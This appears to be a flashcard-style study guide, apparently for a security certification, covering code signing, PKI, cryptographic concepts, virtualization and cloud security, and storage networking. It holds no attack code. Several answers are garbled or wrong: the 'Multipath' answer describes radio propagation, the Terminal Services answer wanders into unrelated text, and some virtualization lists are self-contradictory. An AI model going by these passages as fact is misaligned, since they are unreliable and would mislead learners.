Many code signing mechanisms will offer a method to sign the code using private and public key systems, similar to the process employed by SSL or SSH. In situations where large amounts of content are distributed, code signing is particularly helpful where the origins of a specified piece of code may not be apparent, for example Java applets, ActiveX controls, and other active Web and browser scripting code. What is another use?
Show answer and Breakdown
Answer:
Another significant use is sending updates and patches to existing software. Most Linux distributions, as well as both Apple Mac OS X and Microsoft Windows update their services with code signing to protect from malicious distribution using the patch system.
Trusted Identification using a Certificate Authority (CA)
With code signing, the public key used should be traceable to a trusted root authority, preferably using a secure public key infrastructure (PKI). This doesn’t vary; the code itself is trusted, only that it originates from the stated source or more explicitly, from a particular private key. Given the above, what is the role of a Certificate Authority (CA)?
Show answer and Breakdown
Answer:
A certificate authority offers a root trust level and can apply trust to others by proxy. If a user receives and accepts one of the certificate authorities as a trusted source and receives an executable signed with a key produced by that CA, they can then decide to trust the executable by proxy.
Alternatives to Certificate Authorities
What other methods could one use besides assigning certificate authorities?
Show answer and Breakdown
Answer:
Developers can also choose to supply their own self-generated key. Here the user would need to acquire the public key from the developer to authenticate the object. Code signing methods will often store the public key inside the signature. Some software frameworks and OSs that run the code’s signature for verification will allow the user the option to trust that developer after the first run is executed. An application developer can provide a similar method by including the public keys with the installer.
Problems with Code Signing
The primary problem with code signing is that it can be corrupted, but how?
Show answer and Breakdown
Answer:
Users can be misled into executing unsigned code, or using code that refuses to validate, and the system is only rendered secure as long as the private key remains private.
Implementations of PKI
IBM’s Lotus Notes has had PKI signing of code from Release 1, and both client and server software have execution control lists to control what levels of access to data, environment, and file system are permitted for given users…
Show answer and Breakdown
Answer:
Individual design elements such as scripts, actions and agents, are signed using the editor’s ID file, which includes both the editor’s and the domain’s public keys. Core templates such as the mail template are signed with a dedicated ID held by the Lotus template development team.
What is Non-Repudiation?
Non-repudiation is a security technique used to confirm the data delivery. It offers acknowledgement to the sender of data and verifies the sender’s identity to the recipient so neither can refute the data at a future juncture. Non-repudiation is processed through digital signatures, and affirms the information being sent has been electronically signed by the purported person (receiver). It also…
Show answer and Breakdown
Answer:
verifies the sender’s signature since digital signatures can only be produced by one person. Non-repudiation is used to refer to an interaction where the claimed producer of a statement will be unable to successfully challenge the validity of the statement. This term is frequently used in legal situations where validity of a signature is being challenged. In these cases, the validity is being “repudiated”. For e-commerce and other electronic transactions, all parties involved must be confident that the transaction is secure.
What is Entropy?
Entropy is the randomness gathered by an operating system or application for use in cryptography or other methods that necessitate random data. More:
Show answer and Breakdown
Answer:
This randomness is often gathered from hardware sources, or specially provided randomness generators.
Role of Pseudo Random Number Generation in Security
A pseudorandom number generator (PRNG) is also known as a deterministic random bit generator (DRBG). It is an algorithm for generating a sequence of numbers that approximates the properties of random numbers. This sequence is not inherently random as it’s based on a small set of initial values called the PRNG’s state, which contains…
Show answer and Breakdown
Answer:
a truly random seed. Though sequences that are seemingly more random can be produced using hardware random number generators, pseudorandom numbers are an important technique for their speed in number generation and their replication, and are essential in applications such as simulations, in cryptography, and in procedural generation. A pseudorandom generator is an easily computed method that extends a short random string into a much longer string that appears like a random string to any efficient adversary. It also constructs a private key cryptosystem that’s secure against a plaintext attack. There are few natural examples of functions that are pseudorandom generators. On the other hand, there are several natural examples of another basic primitive: the one-way function. A function is one-way if it is easy to compute, but difficult for an adversary to invert on average.
What is Perfect Forward Secrecy
What is Perfect Forward Secrecy? Perfect forward secrecy (or PFS) is the element that ensures that a session key derived from a set of long-term public and private keys will not be altered if one of the (long-term) private keys is compromised in the future. Forward secrecy has been used…
Show answer and Breakdown
Answer:
interchangeably with perfect forward secrecy, since the term perfect has been debatable in this context. However, at least one detail differentiates perfect forward secrecy from forward secrecy with the additional property: that an agreed key will not be compromised even if agreed keys derived from the same long-term keying material in a subsequent run are compromised.
Confusion and Diffusion and Their Role in Cryptography
Confusion refers to making the correlation between the key and the ciphertext as complex and intricate as possible; diffusion refers to the property that the redundancy in the statistics of the plaintext is “dissipated” in the statistics of the ciphertext. Or, the nonuniformity in the distribution of the individual letters in the plaintext should be redistributed into the non-uniformity in the distribution of much larger elements of the ciphertext, which is more difficult to detect. Find out the roles each play in Cryptography…
Show answer and Breakdown
Answer:
In cryptography, confusion and diffusion are two elements of the operation of a secure cipher. Diffusion is where output bits need to rely on the input bits in a very sophisticated way. In a cipher with effective diffusion, if one bit of the plaintext is altered, then the cipher-text needs to completely change in an unpredictable manner. In general, one may need to change a fixed set of bits and should change each output bit with probability of one half. One of the objectives of confusion is to raise the difficulty in finding the key even if a user has many plain-text and ciphertext pairs created with the same key. Therefore, each bit of the cipher-text should rely on the entire key and in various ways on different bits of the key. Changing one bit of the key should inherently change the cipher-text.
Advantages and Disadvantages of Virtualization
Virtualization offers several advantages to data centers. Implementing virtualization in your data center supports consolidation of your physical servers, reduces hardware costs, and assists network management. Virtualization technology is employed by the virtual machine to run the various programs and software as a real machine. The virtualization technology is used to allow multiple virtual machines to run on a single hardware platform and lets each virtual machine run its separate operating system in the virtualized environment. Some benefits of virtualization technology:
Show answer and Breakdown
Answer:
It lowers hardware maintenance cost.
and then, It enhances security by minimizing the access points in any virtualized environment. It is used to maintain the integrity of the virtualized environment. Any issue related to the one virtual machine does not affect the others.
Types of Virtualization Technology
The different types of virtualization technology include: Platform virtualization technology: This is used to separate an operating system from the core platform assets. Full virtualization technology: It is used to replace the sensitive orders by dual version. Hardware-assisted virtualization technology: It is known as the CPU lock in sensitive commands Partial virtualization technology: It is used for certain apps that are not supported by the operating system. Para-virtualization: It is used to provide a software boundary to VMs. This boundary is a replica of the boundary in the original hardware. Operating system-level virtualization technology: In this technology, the operating structure allows the function of multiple user spaces. Application virtualization technology: It specifies the hosting of individual apps on the new hardware and software. Database virtualization technology: It is used to divide the database layer into segments that are defined between the storage and application layers of the application stack. See the rest…
Show answer and Breakdown
Answer:
Portable application virtualization technology: This is a software program that runs from a removable storage mechanism. Cross-platform virtualization technology: It is used to support software compiled for CPUs and operating systems so that it can run on dissimilar CPUs and/or operating systems. Storage virtualization technology: This is the process of conceptualizing the logical storage from physical storage. Memory virtualization technology: It is used to aggregate the RAM resources from networks. Network virtualization technology: This is the process of the structuring of a server virtualized technology network addressing space. Desktop virtualization technology: It defines the remote direction of a computer desktop. Data virtualization technology: It is used to specify the appearance of data, separate from the original database systems, structures, and storage as a conceptual layer.
The Security Disadvantages of Virtualization
The known security disadvantages of virtualization technology include:
Show answer and Breakdown
Answer:
It is vulnerable to the single point of failure. It requires powerful machines. It can create lower performance. Application virtualization is not always feasible. It leads to the resource contention. It can increase mean time between failures. It is susceptible to various attacks such as DOS, timing attack, and VM escaping.
The Security Advantages of Virtualization
The known security advantages of virtualization include:
Show answer and Breakdown
Answer:
It provides an additional layer of security. It supports strong encapsulation of errors. It enhances intrusion detection through introspection. It minimizes detection of weak software. It increases the flexibility for discovery. It increases efficiency for fault tolerant computing using rollback and snapshot features.
What is Storage Virtualization?
Storage virtualization is a method used in a storage area network (SAN) for the…
Show answer and Breakdown
Answer:
controlling of storage devices. It helps the storage administrator perform the backup, archiving, and recovery functions in a smooth and timely way by suppressing the complexity of SAN.
What is Distributed Computing?
Distributed computing is a study in computer science devoted to distributed systems. In distributed computing, a problem is split up into many tasks, each of which is solved by one computer. A distributed system is made up of…
Show answer and Breakdown
Answer:
of numerous autonomous computers that interact through a computer network. It also refers to the use of distributed systems to solve computational problems. The computers communicate with each other to achieve a common goal.
What is Workspace Virtualization?
A deeper look into workspace virtualization.
Workspace virtualization is the process where applications are distributed to client computers via… click to read more.
Show answer and Breakdown
Answer:
application virtualization; it can integrate some major applications into one inclusive complete workspace. It assists with condensing or encapsulating a computing workspace. At the basic level, the workspace contains everything above the operating system kernel like applications, data, settings, and any other non-privileged operating system subsystems needed to run a functional desktop computing environment.
What is Server Virtualization?
A deeper look into server virtualization.
Server virtualization is a mechanism for dividing a physical server into many virtual servers. These virtual servers can run their own operating system and applications, and can thus function as an individual server. The features of server virtualization include:
Show answer and Breakdown
Answer:
Reduces the number of servers Reduces TCO Enhances availability and business continuity Raises performance for development and test environments
Further Benefits of Virtualization
More benefits of virtualization.
Other benefits of virtualization that you must be aware of include:
Show answer and Breakdown
Answer:
Virtualization expands the utilization of resources. It provides workload balancing as Xen supports virtual machine live migration from one host to another. It provides dynamic fault tolerance against software malfunction (through rapid bootstrapping or rebooting). It provides hardware fault tolerance (through migration of a virtual machine to other hardware). It supports secure separation of virtual operating systems. It supports legacy software as well as new OS instances on the same computer. Virtualization also has benefits in the process of development (including the development of operating systems). When running the new system as a guest it bypasses a reboot of the physical computer whenever a bug occurs.
Securing a Virtualization Administrative Network
How to secure a Virtualization Administrative Network.
Using a virtualization administrative network is a complicated method to obtain access to the management tools which could lead to deeper access either through…
Show answer and Breakdown
Answer:
using the virtual infrastructure client, VI SDK, or other tools. The other aspect to working in a virtualization administrative network is implementing the appropriate systems within this network.
Securing virtual environments, appliances and equipment
You must have a firm understanding of these common security problems when operating in virtual environments.
The following are critical issues that one must be aware of regarding security in a virtual environment:
Show answer and Breakdown
Answer:
Definitional issues concerning vulnerabilities of a virtual environment and essentially, the viable threats to that environment. The administration of applications and operating systems within virtual machines. The use of a virtual administrative network to manage virtual hosts. To strengthen the security of a virtual environment, this tip defines the scope of the virtual environment and reviews some of the security threats at the OS, application, and network levels. The objective for virtualization controllers is to secure the entire virtual environment, not just a hypervisor or management component in isolation. Virtual environment semantics: Uniform definitions of the security components of virtualization are essential. If your definition of a secure virtual environment differs or deviates from prevailing standard definitions, it can create conflicting security recommendations. Two main issues need to be clearly defined in virtualization: One, what comprises a virtual environment? Two, what is considered hostile to that environment? The other issue to be aware of is escaping the VM to reach the management appliance of the hypervisor. This could be accomplished by the network today if the VMs could reach the network using a management appliance. However, access to the management appliance does guarantee access to the hypervisor. For example, VMware ESXi runs its management appliance within the hypervisor, while on VMware ESX the management appliance runs as a separate entity from the hypervisor.
What is a VLAN and How Does it Improve Security?
Explain a VLAN and why it makes a network more secure.
Nodes on the same physical segment can be made to work together as if they were operating on separate segments, or…
Show answer and Breakdown
Answer:
various physical network segments can be designed to appear as if they were on the same segment. Technically a VLAN is a specific broadcast domain within a larger network. VLANs enhance security by grouping users in smaller groups, which creates an added obstruction for potential hackers. Instead of obtaining direct access to the network, the hacker must obtain access to a specific virtual LAN as well.
Which Virtual Networks Should Connect to the VM’s?
Know which virtual networks you should not connect your VM’s to unless approved otherwise.
Unless specifically approved by the security organization, VMs should not reside on the following virtual networks connected to the VMware ESX host:
Show answer and Breakdown
Answer:
Storage network VMotion/SVMotion network VMware Consolidate Backup network Management network
Best Practices to Managing the Guest OS
What you need to know about managing the guest OS.
Management of the guest OS does not require access to VM management tools; specifically access to the remote console. In many cases…
Show answer and Breakdown
Answer:
it requires access to a console, but that can be granted using tools like the Remote Desktop Protocol (RDP), Virtual Network Computing (VNC), or a Secure Shell (SSH). Access to the tools that administer the virtual environment like the VMware Virtual Infrastructure Client (VIC) should be designated to virtualization administrators.
The First Step in Securing a Virtual Network
A Must Know!
What is the first step in securing the virtual network?
Show answer and Breakdown
Answer:
The first step in securing the virtual network is to establish the protocols and procedures that must be followed.
The Second Step in Securing Your Virtual Network – Software Firewalls
The second step in securing your virtual network and why it is the second most important element of security in a virtual environment.
Installing a software firewall is the second step in securing a virtual environment, why?
Show answer and Breakdown
Answer:
Adding a software firewall is the next security method to implement. With several virtual machines environments operating on a single hardware system, there isn’t an effective way to monitor the transactions between the different virtual machines thus malware can run unchecked.
Anti-Virus Software, the Third Step in Securing a Virtual Environment
Why anti-virus software is the third step in securing a virtual environment and how to properly implement it.
Because virtual machines are set up to be self-contained systems, some kind of anti-virus software is required to protect these systems. Even if an antivirus program is installed…
Show answer and Breakdown
Answer:
on the host machine, it won’t extend to the virtual machine environments. Anti-virus scans files and folders on the local host machine, but has no way of scanning those items contained in the virtual environment. That is why antivirus must be placed on all the virtual machine environments.
Physically Securing your Virtual Machines
Learn how to physically secure your virtual machine environment.
Because the introduction of virtual machine environments offers mobility to operating systems, they’re no longer attached…
Show answer and Breakdown
Answer:
to a particular hardware system making it easy for them to be removed or copied. With the production of thumb Drives (up to 64 GB), it would be easy to steal a virtual environment. It’s critical to lock down the physical installation of virtual servers. To secure the virtual machines, they must be stored in a restricted access area.
A Deep Dive into VMWare Workstation
Make sure you have a firm understanding of VMWare Workstation, let's dive in deeper.
VMware Workstation 64 computers from VMware, a division of EMC Corporation, allow users to set up numerous x86 and x86-64 virtual machines (VMs) and utilize one or more of these virtual machines at once with the hosting operating system. Each VM can run its own guest operating system, including Windows, Linux, BSD variants, and others. Essentially a VMware Workstation will allow…
Show answer and Breakdown
Answer:
one machine to run several operating systems at once, whereas other VMware products assist in the management or migration of VMware virtual machines across multiple physical host machines. Workstations are manufactured and sold by VMware; VMware Player is a similar program with fewer features supplied free of charge. VMware Workstation supports connection to existing host network adapters, CD-ROM devices, hard disk drives, and USB devices, and provides the ability to replicate some hardware. For example, it can mount an ISO file as a CD-ROM, and .vmdk files as hard disks, and can configure its network adapter driver to use network address translation (NAT) through the host machine rather than bridging through it. Multiple consecutive snapshots of an operating system running under VMware Workstation can be obtained, and the virtual machine can be returned to the state it was in when any snapshot was saved.
Vulnerabilities associated with a single platform hosting multiple companies’ virtual machines
Lets look closely at the vulnerabilities associated with a single platform hosting multiple companies’ virtual machines.
With virtual platforms substituting as real hardware, they can produce uniquely different and more dynamic usage models than are found in traditional computing environments. This can compromise…
Show answer and Breakdown
Answer:
the security architecture of many organizations which often assume expected and controlled change in number of hosts, host configuration, host location, etc. Also, some of the beneficial mechanisms found within virtual machines can have unpredictable and maleficent interactions with existing security mechanisms.
The Security Burden of Scalability of Virtual Environments
The scalability factor of virtual environments poses a serious security threat. How?
A virtual machine monitor (VMM) offers a layer of software between the operating system and hardware of a machine to produce the illusion of one or more virtual machines (VMs) on a single physical platform. A virtual machine entirely contains the…
Show answer and Breakdown
Answer:
state of the guest operating system running inside it. Encapsulated machine state can be replicated and shared over networks and removable media like a standard file. As well, it can be represented on existing networks and requires configuration and management like a physical machine. VM state can be changed like a physical machine, by running over time, or like a file, through direct modification. Scaling Growth in physical machines is ultimately narrowed by setup time and an organization’s budget. In contrast, creating a new VM is as simplistic as copying a file. Users will often have numerous special purpose VMs for testing or demonstration purposes, called sandbox VMs to test new applications, or for specific applications not offered by their regular OS. This means the total number of VMs in an organization can multiply considerably based on available storage. The rapid scaling in virtual environments can burden the security systems of an organization.
Key Cloud Computing Characteristics
Secure use of cloud computing requires an understanding of certain key characteristics.
Cloud computing is a pay-per-use model for providing available, convenient, on-demand network access to a shared resource of configurable computing resources that can be expediently provisioned and distributed with minimal management time or service provider interaction. This cloud model promotes availability and consists of five key characteristics, three delivery models, and four deployment models. The 5 key cloud characterics include:
Show answer and Breakdown
Answer:
5 Key Cloud Characteristics: On-demand self-service Ubiquitous network access Location independent resource pooling Rapid elasticity Pay per use6
The Three Cloud Computing Delivery Models
There are three key cloud computing delivery models.
The Three Cloud Delivery Models The first two are: Cloud Software as a Service (SaaS) Use provider’s applications over a network Cloud Platform as a Service (PaaS) Deploy customer-created applications to a cloud What is the third model? Click to view…
Show answer and Breakdown
Answer:
Cloud Infrastructure as a Service (IaaS) Rent processing, storage, network capacity, and other fundamental computing resources
The Four Cloud Deployment Models
It is imperative to know the four cloud computing deployment models.
The first two cloud computing deployment models include:
Private cloud Enterprise owned or leased Community cloud Shared infrastructure for specific community What are the other two? Click to view…
Show answer and Breakdown
Answer:
Public cloud Sold to the public, mega-scale infrastructure Hybrid cloud Composition of two or more clouds
The Primary Advantages of Cloud Computing
What are the primary advantages leveraged by cloud computing?
Cloud computing often leverages: Massive scale Virtualization Free software Click to view the others…
Show answer and Breakdown
Answer:
Autonomic computing Multi-tenancy Geographically distributed systems Advanced security technologies Service oriented software
Provisioning in Cloud Computing
You must understand the concept of provisioning in cloud computing.
Provisioning the system from end to end OS, hardware, storage, application, network, and database need to be self-service provisioned. Provisioning is…
Show answer and Breakdown
Answer:
dynamic and self-service provisioning of applications entails applying applications to your cloud infrastructure with a few clicks of the mouse. So, when moving to the cloud, application provisioning will be simplified since there are not hundreds of client machines to deploy at once.
De-provisioning in Cloud Computing
Understand the concept and need for de-provisioning in cloud computing.
Public cloud providers apply multi-tenancy to optimize server workloads and reduce costs. Multi-tenancy shares server space with other organizations so it’s important to know…
Show answer and Breakdown
Answer:
what security mechanisms your cloud provider has in place. Based on sensitivity of data, encryption may need to be used as well. The method of de-provisioning will become more challenging as password verification methods become more sophisticated. Federated identity management schemes will allow users to log on to multiple clouds, and that will make de-provisioning much trickier.
Concerns Regarding Data Remnants
Why are data remnants a concern in cloud computing?
In a cloud infrastructure, data is often moved to make the best use of resources which means organizations can’t always track their data. This is especially true in the public cloud. To keep costs down, an organization wants a service provider to optimize resource usage. Data remnants are a topic of concern because…
Show answer and Breakdown
Answer:
data storage service providers generally do not provide transparency into how resources are shifted to accomplish this. If data is moved, residual data may linger that an unauthorized user could possibly access.
Vulnerabilities with co-mingling of hosts with different security requirements
Determine the vulnerabilities with co-mingling of hosts with different security requirements.
Running VMware in an environment that involves integrated networks causes data commingling, which is usually harmless, can be potentially harmful if…
Show answer and Breakdown
Answer:
the wrong data is commingled. Network convergence happens people typically don’t use 100% of a 10 Gigabit Ethernet network bandwidth; most don’t use the full bandwidth of a 1 Gigabit Ethernet link. The goal is to use the unused bandwidth for other networking purposes as laying new cable is often not possible due to a lack of network interface cards (NICs), and it’s costly as well as time-consuming.
Breaking Out and Interacting with the Hypervisor – VMEscape
Let's dive deep into the process of breaking out and interacting with the hypervisor, which is known as “VMEscape”.
Normally virtual machines are encapsulated, isolated environments. The operating systems running inside the virtual machine should not know that they are virtualized, and there should be no capability of interacting with the parent hypervisor. The process of breaking out and interacting with the hypervisor is called a “VM escape”. Because the hypervisor administers the execution of all of the virtual machines an attacker that can gain access to, the hypervisor can then assume control over every other virtual machine running on the host. Because the hypervisor is…
Show answer and Breakdown
Answer:
situated between the physical hardware and the guest operating system an attacker will then be able to bypass security controls in place on the virtual machine. Virtual machines are programmed to run in self-contained, closed-off environments in the host. Each VM should be, in function, a separate system, kept away from the host operating system and any other VMs running on the same machine. The hypervisor is the go-between the host operating system and virtual machines. It controls the host processor and applies resources as required to each guest operating system. To minimize vulnerability to VMEscape: Keep virtual machine software patched. Install only the resource-sharing features that are required. Keep software installations to a minimum as each program carries vulnerabilities.
Improve Virtualization Security with Privilege Elevation
How does privilege elevation improve security in a virtual environment?
Privilege elevation expands user rights. All users working on clients running Windows 7 have rights of standard users. To run administrative works, administrative privileges are required. It needs to increase the rights of a user from standard user to administrative user. This is a security measure…
Show answer and Breakdown
Answer:
to block administrative changes in a computer by malicious application or a hacker.
What is Virtual Desktop Infrastructure (VDI)
Define Virtual Desktop Infrastructure (VDI).
The Virtual Desktop Infrastructure (VDI) is used to virtualize the desktop environment deploying enterprise-class control, and to increase the manageability. It sustains the familiar end-user environment. It virtualizes the desktop images that are distributed from a centralized hosting server. It gives the end user a virtual PC that replicates the function of their current PC. It is used to consolidate the number of servers that support desktops with these advantages: click to view…
Show answer and Breakdown
Answer:
Green Solution Cost Efficiency Improved Manageability Central management of files and user’s profile.
What is Terminal Services?
Define terminal services.
Terminal Services is a multisession environment that extends access to Window-based programs running on a server to remote computers. When a user runs a program on a Terminal Server, the application process takes place on the server, and only the keyboard, mouse, and display information are exposed over the network. Distributed computing is an area of computer science that examines…
Show answer and Breakdown
Answer:
distributed systems. In a virtualized environment, any issues with the underlying drive impact all the VMs hosted on that drive. PCI requirements are explicit. When commingling the different sites, they are all required to be PCI compliant.
What is Storage Virtualization?
Define storage virtualization.
Storage virtualization is a concept and term used within computer science. Specifically, storage systems may use virtualization approaches as techniques to improve functionality and provide more advanced features within the storage system. A storage system is also referred to as a storage array or Disk array or a filer. Certain software, hardware along with…
Show answer and Breakdown
Answer:
disk drives are utilized by storage systems to provide fast and reliable storage for computing and data processing. Storage systems are complex in structure and are often viewed as specialized computers designed to provide storage capacity along with advanced data protection features. Disk drives are only one component of a storage system, along with hardware and specialized software embedded within the system. Storage systems can provide either block accessed storage, or file accessed storage. Block access is typically deployed over Fibre Channel, iSCSI, SAS, FICON or other protocols. File access is often done through NFS or CIFS protocols.
Two Types of Storage Virtualization
What are the two types of storage virtualization?
Within the context of a storage system, there are two basic types of virtualization that can occur. What are they, and provide a definition:
Show answer and Breakdown
Answer:
Block virtualization: addresses the abstraction of logical storage from physical storage so that it can be accessed without regard to physical storage or heterogeneous structure. This separation gives administrators of the storage system increased flexibility in how they control storage for end users. File virtualization: deals with the NAS challenges by removing dependencies between the data accessed at the file level and the location where the files are physically stored. This allows optimization of storage use and server consolidation and execution of smooth file migrations.
What is Network Attached Storage?
Define Network Attached Storage (NAS).
Network Attached Storage (NAS) is the hard disk storage that’s set up with its own network address instead of direct connection to the unit computer that is serving applications of a network’s workspace users. An elaborate operating system isn’t…
Show answer and Breakdown
Answer:
required on a NAS device, so a basic operating system is used. NAS provides both storage and a file system. The network-attached storage (NAS) device is a server that supports file sharing. The file server runs on a dedicated device connected to the network. These types of devices are based on Linux or UNIX derivatives.
What are the Primary Benefits of Network Attached Storage (NAS)?
Determine the main benefits of NAS.
The main benefits of a NAS device are: Click below to view…
Show answer and Breakdown
Answer:
It is easy to install, configure, and manage by using a web browser. It allows Windows, UNIX/Linux, Mac OS, and Novell clients to use the same storage and access shared data because it can interact with the network by using a variety of protocols, such as the TCP/IP, IPX/SPX, NetBEUI, or AppleTalk protocols. It does not require being located within the server, but can be placed anywhere in LAN. It allows you to add more hard disk storage space to a network without shutting them down for maintenance and upgrades.
The Three Most Widely Used Storage Consolidation Architectures
Determine the three most widely used storage consolidation architectures.
The three most widely used storage consolidation architectures are:
Show answer and Breakdown
Answer:
Network-attached storage (NAS): In NAS, the hard drive that stores the data has its own network address. Files can be stored and accessed quickly because there’s no sharing of processor resources with other computers. Redundant array of independent disks (RAID): In RAID storage consolidation, the data is kept on multiple disks. The array appears as a single logical hard drive. This supports balanced overlapping of input/output (I/O) operations and provides fault tolerance, minimizing downtime, and the risk of catastrophic data loss. Storage area network (SAN): The SAN is the most advanced architecture, and usually uses Fibre Channel technology. SANs are known for their high throughput and the ability to provide centralized storage for multiple subscribers over an extended geographic area. SANs support data sharing and data migration among servers.
What is a Storage Area Network (SAN)?
Be able to define and then describe a Storage Area Network (SAN).
The definition of a Storage Area Network (SAN): Storage Area Network (SAN) is a high-speed sub-network of shared storage devices. A storage device is a machine that’s made up of a disk or disks to store data. Let's describe this technology a little further:
Show answer and Breakdown
Answer:
A Storage Area Network (SAN) is architecture that connects remote computer data storage devices (such as disk arrays, tape libraries, and optical jukeboxes) to servers where the devices materialize as being locally attached to the operating system. A Storage Area Network (SAN) usually has its own system of storage devices that are neither accessible nor are they able to be altered through the regular network by regular devices. The cost and complexity of SANs dropped in the late 2000’s, offering much wider compatibility across both enterprise and small to medium sized business environments.
Storage Area Network Infrastructure – Fibre Channel Fabric Topology
Describe a SAN’s network infrastructure, which is a Fibre Channel Fabric Topology.
SAN Infrastructure: Storage Area Network (SAN) widely uses a Fibre Channel fabric topology. This infrastructure is specifically designed to handle…
Show answer and Breakdown
Answer:
storage communications and networks. It provides faster, easier, and more reliable access than higher-level protocols used in NAS. A Cisco fabric is similar in perception to a network segment in a local area network. A typical Fibre Channel SAN fabric consists of a number of Fibre Channel switches.
The Primary Benefits of Using a Storage Area Network
Describe the primary benefits of SAN’s.
Benefits of using SANs: SAN is a dedicated network that offers access to a consolidated, block level data storage, providing these benefits:
Show answer and Breakdown
Answer:
Storage consolidation reduces costs Storage or servers can be easily added without interruption Data is backed up and restored quickly High performance interface Supports server clusters of eight Disaster tolerance Reduced costs of ownership
The Three Levels of Threats in Storage Area Networks
What are the three levels of threats faced by Storage Area Networks (SANs)?
3 Levels of threats faced by the SAN: Storage area network transfers and stores crucial data; often, this makes the storage area network vulnerable to risks. The three different levels of threats are as follows:
Show answer and Breakdown
Answer:
Level one – threats that are unintentional and may result in downtime and loss of revenue. However, administrators can take measures to prevent these threats. Level two – threats that are simple malicious attacks that use existing equipment. Level three – threats that are serious, large-scale attacks that are difficult to prevent. Usually they’re executed by skilled attackers using specialized equipment.
Top Security Concepts of Security Area Networks
What three concepts make up the security considerations of SAN’s?
Concepts included in SAN security Storage area network (SAN) is a dedicated network that allows access to a concentrated, block level data storage. The security level of SAN is entirely based on the user’s authorization. SAN security involves these ideas:
Show answer and Breakdown
Answer:
Host adapter-based security: Security measures for the Fibre Channel host bus adapter can be applied at the driver level.
Switch zoning: Switch zoning is used in a switch-based Fibre Channel SAN. Technically it means the masking of all nodes connected to the switch.
Storage-controller mapping: By mapping all host adapters against LUNs in the storage system, some storage subsystems accomplish LUN masking in their storage.
Performance Factors of Storage Area Networks
What are the prime performance benefits of Storage Area Networks (SAN’s)?
Performance Rationale for using a SAN SAN offers an advanced-performance interface; over 100 MBPS and data are saved and restored quickly. It also offers disaster tolerance. These are the top performance reasons for using a SAN:
Show answer and Breakdown
Answer:
Better disk utilization Fast and extensive disaster recovery Better availability for applications Faster backup of large amounts of data
What is a Virtual Storage Area Network (VSAN)?
Be familiar with the definition of a Virtual Storage Area Network (VSAN). Also deeply describe the concept.
VSAN stands for Virtual Storage Area Network. VSAN is a specific aspect of a storage area network (SAN) that’s been divided into…
Show answer and Breakdown
Answer:
logical sections, also called partitions. A series of ports form a group of connected Fibre Channel switches that in turn produce a virtual fabric. VSANs were developed by Cisco, designed after the Virtual Local Area Network (VLAN) concept in Ethernet networking. A VSAN provides various high-level protocols such as FCP, FCIP, FICON, and iSCSI.
What is a iSCSI (Internet Small Computer System Interface)
What is the definition of iSCSI (Internet Small Computer System Interface)? Also deeply describe the concept.
iSCSI (Internet Small Computer System Interface) is an IP-based storage networking standard for linking data storage facilities. iSCSI transmits data over…
Show answer and Breakdown
Answer:
intranets and manages storage over extended distances using SCSI commands over IP networks. iSCSI can send data over local area networks, wide area networks, or the Internet and can provide location independent data storage and retrieval. Users can send SCSI commands to SCSI storage devices on remote servers. This is a commonly used storage area network standard that allows businesses to condense storage into data center storage arrays while providing hosts with the appearance of locally-attached disks. In contrast to Fibre Channel, which requires specialized cabling, iSCSI can be extended over long distances using existing network infrastructure.
What is Fibre Channel over Ethernet (FCoE)?
Define and then describe the concept of Fibre Channel over Ethernet (FCoE).
Fibre Channel over Ethernet (FCoE) is an encapsulation of Fibre Channel frames over Ethernet networks. It allows Fibre Channel to…
Show answer and Breakdown
Answer:
use 10 Gigabit Ethernet networks while maintaining the Fibre Channel protocol. FCoE blueprints Fibre Channel over selected full duplex IEEE 802.3 networks for providing I/O consolidation over Ethernet and minimizing network complexity in the datacenter. The FCoE protocol specification replaces the FC0 and FC1 layers of the Fibre Channel stack with Ethernet.
What is Logical Unit Number Masking (LUN Masking)?
Define and then describe the concept of Logical Unit Number Masking (LUN Masking).
Definition of LUN Masking: Logical Unit Number Masking or LUN masking is an authorization process that makes…
Show answer and Breakdown
Answer:
a Logical Unit Number accessible to some hosts and inaccessible to other hosts. LUN masking is applied primarily at the HBA (Host Bus Adapter) level. Some storage controllers are also compatible with LUN Masking. This is significant as Windows-based servers attempt to write volume labels to all available logical unit numbers.
What is Host Bus Adapter (HBA) Allocation?
Define and describe Host Bus Adapter (HBA) allocation.
The Definition of HBA Allocation: HBA or Host Bus Adapter is an I/O adapter that links the…
Show answer and Breakdown
Answer:
host computer bus and the Fibre Channel loop, and administers the transfer of data between them. In order to optimize host processor performance, the host bus adapter runs many low-level interface functions automatically, or with little processor involvement.
What is a Distributed File System (DFS)?
Define and deeply describe Distributed File System (DFS).
Distributed File System (DFS) is a group of client and server services in which an organization using Microsoft Windows servers can arrange many distributed SMB file shares into a distributed file system. DFS supports location transparency and redundancy to enhance data accessibility in the event of system failure or heavy load by allowing shares in several different locations to be logically grouped under one folder, or DFS root. Click for more:
Show answer and Breakdown
Answer:
Distributed File System (DFS) allows users to retrieve files located on another remote host as though working on the actual host computer. This system allows several users on several machines to share files and storage resources. The client nodes do not have direct access to the underlying block storage but interact over the network using a protocol. Distributed file systems may use facilities for transparent replication and fault tolerance. Meaning, when a small number of nodes in a file system are offline, the system keeps running with no loss of data.
What is Secure Storage Management – Multipath?
Define and describe the secure storage management propagation technique, Multipath.
In wireless telecommunications, multipath is the propagation phenomenon that results in radio signals reaching the…
Show answer and Breakdown
Answer:
receiving antennae by two or more paths. It’s a result of atmospheric ducting, ionospheric reflection, and refraction. The outcomes of multipath include constructive and destructive interference, and phase shifting of the signal. This creates Rayleigh fading. The standard statistical model of this gives a distribution known as the Rayleigh distribution.
What is Secure Storage Management – Snapshots?
Define and describe the secure storage management propagation technique of snapshots.
Snapshots are files that hold the configuration and data in a virtualized machine. The Hyper-V Manager Console allows…
Show answer and Breakdown
Answer:
the facility to take a snapshot of a virtual machine running under Hyper-V. The benefit of a snapshot is it allows roll-back of an operating system at the instant the snapshot was taken. In cases of malfunction or corruption of a virtual machine, snapshots are useful tools in the recovery process.
What is Secure Storage Management – Data De-duplication?
Define and describe the secure storage management propagation technique of data de-duplication.
Data de-duplication offers its own benefits. Reduced storage space requirements will…
Show answer and Breakdown
Answer:
save money on disk expenditures. Efficient conservation of disk space also allows for longer disk retention periods, which results in better recovery time objectives (RTO) over time and minimizes the need for tape backups. Data de-duplication also curtails the amount of data that must be transmitted across a WAN for remote backups, replication, and disaster recovery.
What is Remote Access?
Describe the concept of remote access network design.
Remote access: A network’s secure remote access has become a critical component in a working enterprise. Remote access assists the process of…
Show answer and Breakdown
Answer:
accessing a computer or a network from a remote location. In many businesses, personnel operating in branch offices or employees who telecommute or travel rely on remote access to link up to their organization’s network. Home users can connect to the Internet via remote access to an Internet service provider (ISP).
Network Design and the Placement of Security Devices
